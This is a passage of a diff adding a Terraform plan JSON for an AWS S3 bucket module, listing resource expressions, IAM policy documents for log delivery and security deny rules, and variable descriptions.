+                                                            "var.object_lock_configuration.rule.default_retention",
+                                                            "var.object_lock_configuration.rule",
+                                                            "var.object_lock_configuration"
+                                                        ]
+                                                    },
+                                                    "years": {
+                                                        "references": [
+                                                            "var.object_lock_configuration.rule.default_retention.years",
+                                                            "var.object_lock_configuration.rule.default_retention",
+                                                            "var.object_lock_configuration.rule",
+                                                            "var.object_lock_configuration"
+                                                        ]
+                                                    }
+                                                }
+                                            ]
+                                        }
+                                    ],
+                                    "token": {
+                                        "references": [
+                                            "var.object_lock_configuration.token",
+                                            "var.object_lock_configuration"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.object_lock_enabled",
+                                        "var.object_lock_configuration.rule.default_retention",
+                                        "var.object_lock_configuration.rule",
+                                        "var.object_lock_configuration"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_ownership_controls.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_ownership_controls",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "local.attach_policy",
+                                            "aws_s3_bucket_policy.this[0].id",
+                                            "aws_s3_bucket_policy.this[0]",
+                                            "aws_s3_bucket_policy.this",
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "rule": [
+                                        {
+                                            "object_ownership": {
+                                                "references": [
+                                                    "var.object_ownership"
+                                                ]
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.control_object_ownership"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_policy.this",
+                                    "aws_s3_bucket_public_access_block.this",
+                                    "aws_s3_bucket.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_policy.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_policy",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "policy": {
+                                        "references": [
+                                            "data.aws_iam_policy_document.combined[0].json",
+                                            "data.aws_iam_policy_document.combined[0]",
+                                            "data.aws_iam_policy_document.combined"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.attach_policy"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_public_access_block.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_public_access_block.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_public_access_block",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "block_public_acls": {
+                                        "references": [
+                                            "var.block_public_acls"
+                                        ]
+                                    },
+                                    "block_public_policy": {
+                                        "references": [
+                                            "var.block_public_policy"
+                                        ]
+                                    },
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "ignore_public_acls": {
+                                        "references": [
+                                            "var.ignore_public_acls"
+                                        ]
+                                    },
+                                    "restrict_public_buckets": {
+                                        "references": [
+                                            "var.restrict_public_buckets"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_public_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_replication_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_replication_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "role": {
+                                        "references": [
+                                            "var.replication_configuration[\"role\"]",
+                                            "var.replication_configuration"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.replication_configuration"
+                                    ]
+                                },
+                                "depends_on": [
+                                    "aws_s3_bucket_versioning.this"
+                                ]
+                            },
+                            {
+                                "address": "aws_s3_bucket_request_payment_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_request_payment_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    },
+                                    "payer": {
+                                        "references": [
+                                            "var.request_payer"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.request_payer"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_server_side_encryption_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_server_side_encryption_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.server_side_encryption_configuration"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_versioning.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_versioning",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    },
+                                    "mfa": {
+                                        "references": [
+                                            "var.versioning[\"mfa\"]",
+                                            "var.versioning"
+                                        ]
+                                    },
+                                    "versioning_configuration": [
+                                        {
+                                            "mfa_delete": {
+                                                "references": [
+                                                    "var.versioning[\"mfa_delete\"]",
+                                                    "var.versioning",
+                                                    "var.versioning[\"mfa_delete\"]",
+                                                    "var.versioning"
+                                                ]
+                                            },
+                                            "status": {
+                                                "references": [
+                                                    "var.versioning[\"enabled\"]",
+                                                    "var.versioning",
+                                                    "var.versioning[\"status\"]",
+                                                    "var.versioning",
+                                                    "var.versioning[\"status\"]",
+                                                    "var.versioning"
+                                                ]
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.versioning"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "aws_s3_bucket_website_configuration.this",
+                                "mode": "managed",
+                                "type": "aws_s3_bucket_website_configuration",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "bucket": {
+                                        "references": [
+                                            "aws_s3_bucket.this[0].id",
+                                            "aws_s3_bucket.this[0]",
+                                            "aws_s3_bucket.this"
+                                        ]
+                                    },
+                                    "expected_bucket_owner": {
+                                        "references": [
+                                            "var.expected_bucket_owner"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.website"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_caller_identity.current",
+                                "mode": "data",
+                                "type": "aws_caller_identity",
+                                "name": "current",
+                                "provider_config_key": "s3-bucket:aws",
+                                "schema_version": 0
+                            },
+                            {
+                                "address": "data.aws_canonical_user_id.this",
+                                "mode": "data",
+                                "type": "aws_canonical_user_id",
+                                "name": "this",
+                                "provider_config_key": "s3-bucket:aws",
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.create_bucket_acl",
+                                        "var.owner[\"id\"]",
+                                        "var.owner"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.access_log_delivery",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "access_log_delivery",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "logging.s3.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "AWSAccessLogDeliveryWrite"
+                                            }
+                                        },
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:GetBucketAcl"
+                                                ]
+                                            },
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "logging.s3.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "AWSAccessLogDeliveryAclCheck"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_access_log_delivery_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.combined",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "combined",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "source_policy_documents": {
+                                        "references": [
+                                            "var.attach_elb_log_delivery_policy",
+                                            "data.aws_iam_policy_document.elb_log_delivery[0].json",
+                                            "data.aws_iam_policy_document.elb_log_delivery[0]",
+                                            "data.aws_iam_policy_document.elb_log_delivery",
+                                            "var.attach_lb_log_delivery_policy",
+                                            "data.aws_iam_policy_document.lb_log_delivery[0].json",
+                                            "data.aws_iam_policy_document.lb_log_delivery[0]",
+                                            "data.aws_iam_policy_document.lb_log_delivery",
+                                            "var.attach_access_log_delivery_policy",
+                                            "data.aws_iam_policy_document.access_log_delivery[0].json",
+                                            "data.aws_iam_policy_document.access_log_delivery[0]",
+                                            "data.aws_iam_policy_document.access_log_delivery",
+                                            "var.attach_require_latest_tls_policy",
+                                            "data.aws_iam_policy_document.require_latest_tls[0].json",
+                                            "data.aws_iam_policy_document.require_latest_tls[0]",
+                                            "data.aws_iam_policy_document.require_latest_tls",
+                                            "var.attach_deny_insecure_transport_policy",
+                                            "data.aws_iam_policy_document.deny_insecure_transport[0].json",
+                                            "data.aws_iam_policy_document.deny_insecure_transport[0]",
+                                            "data.aws_iam_policy_document.deny_insecure_transport",
+                                            "var.attach_deny_unencrypted_object_uploads",
+                                            "data.aws_iam_policy_document.deny_unencrypted_object_uploads[0].json",
+                                            "data.aws_iam_policy_document.deny_unencrypted_object_uploads[0]",
+                                            "data.aws_iam_policy_document.deny_unencrypted_object_uploads",
+                                            "var.attach_deny_incorrect_kms_key_sse",
+                                            "data.aws_iam_policy_document.deny_incorrect_kms_key_sse[0].json",
+                                            "data.aws_iam_policy_document.deny_incorrect_kms_key_sse[0]",
+                                            "data.aws_iam_policy_document.deny_incorrect_kms_key_sse",
+                                            "var.attach_deny_incorrect_encryption_headers",
+                                            "data.aws_iam_policy_document.deny_incorrect_encryption_headers[0].json",
+                                            "data.aws_iam_policy_document.deny_incorrect_encryption_headers[0]",
+                                            "data.aws_iam_policy_document.deny_incorrect_encryption_headers",
+                                            "var.attach_inventory_destination_policy",
+                                            "var.attach_analytics_destination_policy",
+                                            "data.aws_iam_policy_document.inventory_and_analytics_destination_policy[0].json",
+                                            "data.aws_iam_policy_document.inventory_and_analytics_destination_policy[0]",
+                                            "data.aws_iam_policy_document.inventory_and_analytics_destination_policy",
+                                            "var.attach_policy",
+                                            "var.policy"
+                                        ]
+                                    }
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "local.attach_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.deny_incorrect_encryption_headers",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "deny_incorrect_encryption_headers",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringNotEquals"
+                                                    },
+                                                    "values": {
+                                                        "references": [
+                                                            "var.server_side_encryption_configuration.rule.apply_server_side_encryption_by_default.sse_algorithm",
+                                                            "var.server_side_encryption_configuration.rule.apply_server_side_encryption_by_default",
+                                                            "var.server_side_encryption_configuration.rule",
+                                                            "var.server_side_encryption_configuration"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-server-side-encryption"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyIncorrectEncryptionHeaders"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_deny_incorrect_encryption_headers"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.deny_incorrect_kms_key_sse",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "deny_incorrect_kms_key_sse",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringNotEquals"
+                                                    },
+                                                    "values": {
+                                                        "references": [
+                                                            "var.allowed_kms_key_arn"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-server-side-encryption-aws-kms-key-id"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyIncorrectKmsKeySse"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_deny_incorrect_kms_key_sse"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.deny_insecure_transport",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "deny_insecure_transport",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:*"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "Bool"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            "false"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "aws:SecureTransport"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this",
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyInsecureTransport"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_deny_insecure_transport_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.deny_unencrypted_object_uploads",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "deny_unencrypted_object_uploads",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "Null"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            true
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-server-side-encryption"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyUnencryptedObjectUploads"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_deny_unencrypted_object_uploads"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.elb_log_delivery",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "elb_log_delivery",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "logdelivery.elasticloadbalancing.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": ""
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_elb_log_delivery_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.inventory_and_analytics_destination_policy",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "inventory_and_analytics_destination_policy",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "ArnLike"
+                                                    },
+                                                    "values": {
+                                                        "references": [
+                                                            "var.inventory_self_source_destination",
+                                                            "aws_s3_bucket.this[0].arn",
+                                                            "aws_s3_bucket.this[0]",
+                                                            "aws_s3_bucket.this",
+                                                            "var.inventory_source_bucket_arn",
+                                                            "var.analytics_self_source_destination",
+                                                            "aws_s3_bucket.this[0].arn",
+                                                            "aws_s3_bucket.this[0]",
+                                                            "aws_s3_bucket.this",
+                                                            "var.analytics_source_bucket_arn"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "aws:SourceArn"
+                                                    }
+                                                },
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringEquals"
+                                                    },
+                                                    "values": {
+                                                        "references": [
+                                                            "var.inventory_self_source_destination",
+                                                            "data.aws_caller_identity.current.id",
+                                                            "data.aws_caller_identity.current",
+                                                            "var.inventory_source_account_id",
+                                                            "var.analytics_self_source_destination",
+                                                            "data.aws_caller_identity.current.id",
+                                                            "data.aws_caller_identity.current",
+                                                            "var.analytics_source_account_id"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "aws:SourceAccount"
+                                                    }
+                                                },
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringEquals"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            "bucket-owner-full-control"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-acl"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "s3.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "destinationInventoryAndAnalyticsPolicy"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_inventory_destination_policy",
+                                        "var.attach_analytics_destination_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.lb_log_delivery",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "lb_log_delivery",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:PutObject"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "StringEquals"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            "bucket-owner-full-control"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:x-amz-acl"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "delivery.logs.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "AWSLogDeliveryWrite"
+                                            }
+                                        },
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:GetBucketAcl",
+                                                    "s3:ListBucket"
+                                                ]
+                                            },
+                                            "effect": {
+                                                "constant_value": "Allow"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "delivery.logs.amazonaws.com"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "Service"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "AWSLogDeliveryAclCheck"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_lb_log_delivery_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_iam_policy_document.require_latest_tls",
+                                "mode": "data",
+                                "type": "aws_iam_policy_document",
+                                "name": "require_latest_tls",
+                                "provider_config_key": "s3-bucket:aws",
+                                "expressions": {
+                                    "statement": [
+                                        {
+                                            "actions": {
+                                                "constant_value": [
+                                                    "s3:*"
+                                                ]
+                                            },
+                                            "condition": [
+                                                {
+                                                    "test": {
+                                                        "constant_value": "NumericLessThan"
+                                                    },
+                                                    "values": {
+                                                        "constant_value": [
+                                                            "1.2"
+                                                        ]
+                                                    },
+                                                    "variable": {
+                                                        "constant_value": "s3:TlsVersion"
+                                                    }
+                                                }
+                                            ],
+                                            "effect": {
+                                                "constant_value": "Deny"
+                                            },
+                                            "principals": [
+                                                {
+                                                    "identifiers": {
+                                                        "constant_value": [
+                                                            "*"
+                                                        ]
+                                                    },
+                                                    "type": {
+                                                        "constant_value": "*"
+                                                    }
+                                                }
+                                            ],
+                                            "resources": {
+                                                "references": [
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this",
+                                                    "aws_s3_bucket.this[0].arn",
+                                                    "aws_s3_bucket.this[0]",
+                                                    "aws_s3_bucket.this"
+                                                ]
+                                            },
+                                            "sid": {
+                                                "constant_value": "denyOutdatedTLS"
+                                            }
+                                        }
+                                    ]
+                                },
+                                "schema_version": 0,
+                                "count_expression": {
+                                    "references": [
+                                        "local.create_bucket",
+                                        "var.attach_require_latest_tls_policy"
+                                    ]
+                                }
+                            },
+                            {
+                                "address": "data.aws_partition.current",
+                                "mode": "data",
+                                "type": "aws_partition",
+                                "name": "current",
+                                "provider_config_key": "s3-bucket:aws",
+                                "schema_version": 0
+                            },
+                            {
+                                "address": "data.aws_region.current",
+                                "mode": "data",
+                                "type": "aws_region",
+                                "name": "current",
+                                "provider_config_key": "s3-bucket:aws",
+                                "schema_version": 0
+                            }
+                        ],
+                        "variables": {
+                            "acceleration_status": {
+                                "default": null,
+                                "description": "(Optional) Sets the accelerate configuration of an existing bucket. Can be Enabled or Suspended."
+                            },
+                            "access_log_delivery_policy_source_accounts": {
+                                "default": [],
+                                "description": "(Optional) List of AWS Account IDs should be allowed to deliver access logs to this bucket."
+                            },
+                            "access_log_delivery_policy_source_buckets": {
+                                "default": [],
+                                "description": "(Optional) List of S3 bucket ARNs wich should be allowed to deliver access logs to this bucket."
+                            },
+                            "acl": {
+                                "default": null,
+                                "description": "(Optional) The canned ACL to apply. Conflicts with `grant`"
+                            },
+                            "allowed_kms_key_arn": {
+                                "default": null,
+                                "description": "The ARN of KMS key which should be allowed in PutObject"
+                            },
+                            "analytics_configuration": {
+                                "default": {},
+                                "description": "Map containing bucket analytics configuration."
+                            },
+                            "analytics_self_source_destination": {
+                                "default": false,
+                                "description": "Whether or not the analytics source bucket is also the destination bucket."
+                            },
+                            "analytics_source_account_id": {
+                                "default": null,
+                                "description": "The analytics source account id."
+                            },
+                            "analytics_source_bucket_arn": {
+                                "default": null,
+                                "description": "The analytics source bucket ARN."
+                            },
+                            "attach_access_log_delivery_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have S3 access log delivery policy attached"
+                            },
+                            "attach_analytics_destination_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have bucket analytics destination policy attached."
+                            },
+                            "attach_deny_incorrect_encryption_headers": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should deny incorrect encryption headers policy attached."
+                            },
+                            "attach_deny_incorrect_kms_key_sse": {
+                                "default": false,
+                                "description": "Controls if S3 bucket policy should deny usage of incorrect KMS key SSE."
+                            },
+                            "attach_deny_insecure_transport_policy": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should have deny non-SSL transport policy attached"
+                            },
+                            "attach_deny_unencrypted_object_uploads": {
+                                "default": false,
+                                "description": "Controls if S3 bucket should deny unencrypted object uploads policy attached."
+                            },
+                            "attach_elb_log_delivery_policy": {
+                                "default": false,
